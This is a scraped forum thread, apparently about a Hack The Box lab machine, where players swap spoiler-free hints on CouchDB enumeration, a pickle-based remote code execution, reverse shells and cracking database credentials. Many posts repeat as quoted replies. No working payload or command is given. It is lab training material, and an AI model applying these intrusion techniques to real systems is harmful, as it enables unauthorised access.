@batman786 said:
is the submit form vulnerable or not ?? 1st parameter checks for a regex name matching and the 2nd parameter ...tried many injection techniques ...can't verify its vulnerable or not...any hints pls...))
Enumerate more and then revisit the form. You'll see the light and understand how to check it
Its couchdb right... Its kinda hard to exploit....))
@batman786 said:
is the submit form vulnerable or not ?? 1st parameter checks for a regex name matching and the 2nd parameter ...tried many injection techniques ...can't verify its vulnerable or not...any hints pls...))
Enumerate more and then revisit the form. You'll see the light and understand how to check it
Its couchdb right... Its kinda hard to exploit....))
Use a very popular tool to enumerate the server again...more thoroughly
I can't believe it took me so long to get user.txt after initial foothold. I had access to the right place, but overlooked a crucial and glaring repository of information that was staring me in the face! Don't overlook things just because you're looking for an RCE exploit! You might miss something important. Finally got user!
Back at this after a week of taking break. I could recreate the page locally, I can see the history and what seems to be a vulnerable URL. I can get it do the 'correct' thing but I am stuck on that.
Out of ideas how to gain a foothold/get a shell - any hints on PM would be appreciated, don't spoon feed me if you do, just a nudge. Google thinks i'm an automated bot for the amount of searches i've done today...
Can't really understand how I'm supposed to get something to run when it can't find imports, can't import by filename and it can't find things to do eval as can't find that either... hopefully that's not a spoiler for someone, it could just be that i'm doing it wrong.
Eyes are burning from the fail.
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Hint to anyone lurking here who is getting odd results when trying to do the business on the requests... read the comments around dos2unix and the python library for sending requests etc... d'oh!
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Hi there, enumerated this machine and found the 2 services. Also tried to find a vuln in the webapp while going for the s****t form. No success trying to attach the C*****B. Could someone please give me a hint via pm?
Hi! I've some problems using python requests to exploit the initial RCE:
using the same exploit works locally but when sending the payload to the server i get error 500.
I've also added the header application/x-www-form-urlencoded to the POST.
@dodo said:
Hi! I've some problems using python requests to exploit the initial RCE:
using the same exploit works locally but when sending the payload to the server i get error 500.
I've also added the header application/x-www-form-urlencoded to the POST.
I need to add something as header?
In exactly the same spot. Would love a nudge on the payload for RCE. Can post and check the result based on the hash. If the *1 string is not found I get a good 200 back with the string; if it is found its 500 each time, but works locally.
@dodo said:
Hi! I've some problems using python requests to exploit the initial RCE:
using the same exploit works locally but when sending the payload to the server i get error 500.
I've also added the header application/x-www-form-urlencoded to the POST.
I need to add something as header?
In exactly the same spot. Would love a nudge on the payload for RCE. Can post and check the result based on the hash. If the *1 string is not found I get a good 200 back with the string; if it is found its 500 each time, but works locally.
no need to add headers ....just make a script to automate all required job..
@dodo said:
Hi! I've some problems using python requests to exploit the initial RCE:
using the same exploit works locally but when sending the payload to the server i get error 500.
I've also added the header application/x-www-form-urlencoded to the POST.
I need to add something as header?
In exactly the same spot. Would love a nudge on the payload for RCE. Can post and check the result based on the hash. If the *1 string is not found I get a good 200 back with the string; if it is found its 500 each time, but works locally.
no need to add headers ....just make a script to automate all required job..
I should have mentioned this is all being done in the same python script, leaving me to think its something to do with the payload encoding in the post request.
@dodo said:
Hi! I've some problems using python requests to exploit the initial RCE:
using the same exploit works locally but when sending the payload to the server i get error 500.
I've also added the header application/x-www-form-urlencoded to the POST.
I need to add something as header?
In exactly the same spot. Would love a nudge on the payload for RCE. Can post and check the result based on the hash. If the *1 string is not found I get a good 200 back with the string; if it is found its 500 each time, but works locally.
no need to add headers ....just make a script to automate all required job..
I should have mentioned this is all being done in the same python script, leaving me to think its something to do with the payload encoding in the post request.
if it works locally ...then it will work remotely but ensure to try all payloads and automate those tasks which are working behind the scenes according to that file( You know which i'm talking about..)
I have a love / hate relationship with this box. I love the things I've had to learn to get onto the box (albeit in a rubbish shell with no privs). I hate the constant failure at getting creds out of the DB.
Still, when I eventually get user or root, I will cheer me up...
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
So I cracked and came back to this tonight - a bit of time with the DB manpages and I've to usernames and passwords out of the DB. Tomorrow I get the "fun" task of working out where to use them...
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Can anybody give me a clue about RCE? I could not succeed to work it. I am taking badcharerror. I think soource of the error is char, but i could not find to bypass it.
Comments
Its couchdb right... Its kinda hard to exploit....))
Use a very popular tool to enumerate the server again...more thoroughly
@TheSecEng and @dirtychai thanks for help ......found what you were talking about ...should have focused more on vulnhub challenges....))
Ah root. Awesome box by @overcast! If you need hints, pm me.
I can't believe it took me so long to get user.txt after initial foothold. I had access to the right place, but overlooked a crucial and glaring repository of information that was staring me in the face! Don't overlook things just because you're looking for an RCE exploit! You might miss something important. Finally got user!
Back at this after a week of taking break. I could recreate the page locally, I can see the history and what seems to be a vulnerable URL. I can get it do the 'correct' thing but I am stuck on that.
Rooted at last:))
Anyone need a hint can PM on every stage
I'm sure I enumerated anything I can find, still stuck on foothold...
any hint or anyone I can DM to show what I found ?
ARGH! :-)
Can anyone give me a nudge?
I have a working payload... but the pesky character prefix is giving me a pickling headache!
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Nevermind... worked it out... xD
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
any one pm me for the initinalfoothold
OSCP | I'm not a rapper
Eeek... running the flask.. I see the problem with the reverse shell and the normal methods! Back at it tomorrow!
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Out of ideas how to gain a foothold/get a shell - any hints on PM would be appreciated, don't spoon feed me if you do, just a nudge. Google thinks i'm an automated bot for the amount of searches i've done today...
Can't really understand how I'm supposed to get something to run when it can't find imports, can't import by filename and it can't find things to do eval as can't find that either... hopefully that's not a spoiler for someone, it could just be that i'm doing it wrong.
Eyes are burning from the fail.
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Finally.. rooted
Hint to anyone lurking here who is getting odd results when trying to do the business on the requests... read the comments around dos2unix and the python library for sending requests etc... d'oh!
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Hi there, enumerated this machine and found the 2 services. Also tried to find a vuln in the webapp while going for the s****t form. No success trying to attach the C*****B. Could someone please give me a hint via pm?
Hi! I've some problems using python
requests
to exploit the initial RCE:using the same exploit works locally but when sending the payload to the server i get error 500.
I've also added the header
application/x-www-form-urlencoded
to the POST.I need to add something as header?
In exactly the same spot. Would love a nudge on the payload for RCE. Can post and check the result based on the hash. If the *1 string is not found I get a good 200 back with the string; if it is found its 500 each time, but works locally.
no need to add headers ....just make a script to automate all required job..
I should have mentioned this is all being done in the same python script, leaving me to think its something to do with the payload encoding in the post request.
Wowsers that took a while to do, great lab...
If it's encoding, read back through these posts and the mention of dos2unix, would it work with that done? Maybe read it in from a file?
I can't give too much away... but I spent alot of time struggling at the same point.
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
if it works locally ...then it will work remotely but ensure to try all payloads and automate those tasks which are working behind the scenes according to that file( You know which i'm talking about..)
rooted,, i didn't submit root or user flag because i feel like i cheated lol
OSCP | I'm not a rapper
just got shell - any point messing with this dot file? john says no thanks, rockyou. any hints will save many cpu cycles kittens
NVM TOO LATE ALL KITTEH DED NAO
Relax. Take a rest, have a lay down on a type of sofa/chair and see what's running on the box.
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Joking no kitteh ded - got flags already. Loved this box - maybe too easy but 11/10 would pwn again...
Complex.
Very complex box.
I would wait for this box to retire and see how to solve it. This one is tougher than other boxes(along with silo).
OSCP
I have a love / hate relationship with this box. I love the things I've had to learn to get onto the box (albeit in a rubbish shell with no privs). I hate the constant failure at getting creds out of the DB.
Still, when I eventually get user or root, I will cheer me up...
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
So I cracked and came back to this tonight - a bit of time with the DB manpages and I've to usernames and passwords out of the DB. Tomorrow I get the "fun" task of working out where to use them...
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Can anybody give me a clue about RCE? I could not succeed to work it. I am taking badcharerror. I think soource of the error is char, but i could not find to bypass it.